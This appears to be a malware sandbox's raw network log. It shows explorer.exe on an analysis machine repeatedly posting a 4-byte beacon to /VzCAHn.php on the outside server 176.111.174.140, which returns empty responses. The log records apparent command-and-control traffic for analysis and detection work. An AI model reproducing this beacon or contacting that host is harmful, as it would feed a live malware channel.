                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 01:23:42 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                  X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  10192.168.2.449746176.111.174.140802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:44.377278090 CET279OUTPOST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1
                                                                                                                                                                                                                                                  Host: 176.111.174.140
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Content-type: text/html
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:44.498792887 CET6OUTData Raw: 12 59 59 54
                                                                                                                                                                                                                                                  Data Ascii: YYT
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:46.181965113 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 01:23:44 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                  X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  11192.168.2.449748176.111.174.140802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:46.408838034 CET279OUTPOST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1
                                                                                                                                                                                                                                                  Host: 176.111.174.140
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Content-type: text/html
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:46.528816938 CET6OUTData Raw: 12 59 59 54
                                                                                                                                                                                                                                                  Data Ascii: YYT
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.138202906 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 01:23:46 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                  X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  12192.168.2.449749176.111.174.140802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.361948013 CET279OUTPOST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1
                                                                                                                                                                                                                                                  Host: 176.111.174.140
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Content-type: text/html
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.483542919 CET6OUTData Raw: 12 59 59 54
                                                                                                                                                                                                                                                  Data Ascii: YYT
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.989465952 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 01:23:48 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                  X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  13192.168.2.449750176.111.174.140802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:50.226038933 CET279OUTPOST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1
                                                                                                                                                                                                                                                  Host: 176.111.174.140
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Content-type: text/html
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:50.352422953 CET6OUTData Raw: 12 59 59 54
                                                                                                                                                                                                                                                  Data Ascii: YYT
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:51.723892927 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 01:23:50 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                  X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  14192.168.2.449751176.111.174.140802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:51.956063986 CET279OUTPOST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1
                                                                                                                                                                                                                                                  Host: 176.111.174.140
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Content-type: text/html
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:52.076358080 CET6OUTData Raw: 12 59 59 54
                                                                                                                                                                                                                                                  Data Ascii: YYT
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:53.449795008 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 01:23:52 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                  X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  15192.168.2.449752176.111.174.140802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:53.738969088 CET279OUTPOST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1
                                                                                                                                                                                                                                                  Host: 176.111.174.140
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Content-type: text/html
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:53.860511065 CET6OUTData Raw: 12 59 59 54
                                                                                                                                                                                                                                                  Data Ascii: YYT
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:55.355663061 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 01:23:54 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                  X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  16192.168.2.449753176.111.174.140802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:55.580255985 CET279OUTPOST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1
                                                                                                                                                                                                                                                  Host: 176.111.174.140
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Content-type: text/html
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:55.700721025 CET6OUTData Raw: 12 59 59 54
                                                                                                                                                                                                                                                  Data Ascii: YYT
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:57.293770075 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 01:23:56 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                  X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  17192.168.2.449754176.111.174.140802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:57.539582014 CET279OUTPOST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1
                                                                                                                                                                                                                                                  Host: 176.111.174.140
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Content-type: text/html
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:57.664227009 CET6OUTData Raw: 12 59 59 54
                                                                                                                                                                                                                                                  Data Ascii: YYT
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:59.276941061 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 01:23:58 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                  X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  18192.168.2.449755176.111.174.140802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:59.523997068 CET279OUTPOST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1
                                                                                                                                                                                                                                                  Host: 176.111.174.140
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Content-type: text/html
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:59.644032001 CET6OUTData Raw: 12 59 59 54
                                                                                                                                                                                                                                                  Data Ascii: YYT
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:01.074035883 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 01:24:00 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                  X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  19192.168.2.449756176.111.174.140802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:01.301248074 CET279OUTPOST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1
                                                                                                                                                                                                                                                  Host: 176.111.174.140
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Content-type: text/html
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:01.421483994 CET6OUTData Raw: 12 59 59 54
                                                                                                                                                                                                                                                  Data Ascii: YYT
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:02.872258902 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 01:24:01 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                  X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  20192.168.2.449758176.111.174.140802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:03.134176970 CET279OUTPOST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1
                                                                                                                                                                                                                                                  Host: 176.111.174.140
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Content-type: text/html
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:03.343862057 CET6OUTData Raw: 12 59 59 54
                                                                                                                                                                                                                                                  Data Ascii: YYT
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:04.735805035 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 01:24:03 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                  X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  21192.168.2.449764176.111.174.140802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:04.971822977 CET279OUTPOST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1
                                                                                                                                                                                                                                                  Host: 176.111.174.140
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Content-type: text/html
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:05.092073917 CET6OUTData Raw: 12 59 59 54
                                                                                                                                                                                                                                                  Data Ascii: YYT
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:06.708615065 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 01:24:05 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                  X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  22192.168.2.449765176.111.174.140802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:06.940301895 CET279OUTPOST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1
                                                                                                                                                                                                                                                  Host: 176.111.174.140
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Content-type: text/html
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:07.062712908 CET6OUTData Raw: 12 59 59 54
                                                                                                                                                                                                                                                  Data Ascii: YYT
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:08.599889994 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 01:24:07 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                  X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  23192.168.2.449771176.111.174.140802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:08.841689110 CET279OUTPOST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1
                                                                                                                                                                                                                                                  Host: 176.111.174.140
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Content-type: text/html
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:08.961483002 CET6OUTData Raw: 12 59 59 54
                                                                                                                                                                                                                                                  Data Ascii: YYT
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:10.794534922 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 01:24:09 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                  X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  24192.168.2.449777176.111.174.140802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:11.033312082 CET279OUTPOST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1
                                                                                                                                                                                                                                                  Host: 176.111.174.140
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Content-type: text/html
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:11.153068066 CET6OUTData Raw: 12 59 59 54
                                                                                                                                                                                                                                                  Data Ascii: YYT
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:12.747080088 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 01:24:11 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                  X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  25192.168.2.449783176.111.174.140802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:12.971549034 CET279OUTPOST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1
                                                                                                                                                                                                                                                  Host: 176.111.174.140
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Content-type: text/html
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:13.091403008 CET6OUTData Raw: 12 59 59 54
                                                                                                                                                                                                                                                  Data Ascii: YYT
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:14.875293970 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 01:24:13 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                  X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  26192.168.2.449789176.111.174.140802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:15.118401051 CET279OUTPOST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1
                                                                                                                                                                                                                                                  Host: 176.111.174.140
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Content-type: text/html
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:15.238245964 CET6OUTData Raw: 12 59 59 54
                                                                                                                                                                                                                                                  Data Ascii: YYT
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:16.915497065 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 01:24:15 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                  X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  27192.168.2.449795176.111.174.140802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:17.142981052 CET279OUTPOST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1
                                                                                                                                                                                                                                                  Host: 176.111.174.140
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Content-type: text/html
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:17.262917995 CET6OUTData Raw: 12 59 59 54
                                                                                                                                                                                                                                                  Data Ascii: YYT
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:18.918163061 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 01:24:17 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                  X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  28192.168.2.449802176.111.174.140802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:19.145009041 CET279OUTPOST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1
                                                                                                                                                                                                                                                  Host: 176.111.174.140
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Content-type: text/html
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:19.268757105 CET6OUTData Raw: 12 59 59 54
                                                                                                                                                                                                                                                  Data Ascii: YYT
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:20.645544052 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 01:24:19 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                  X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8


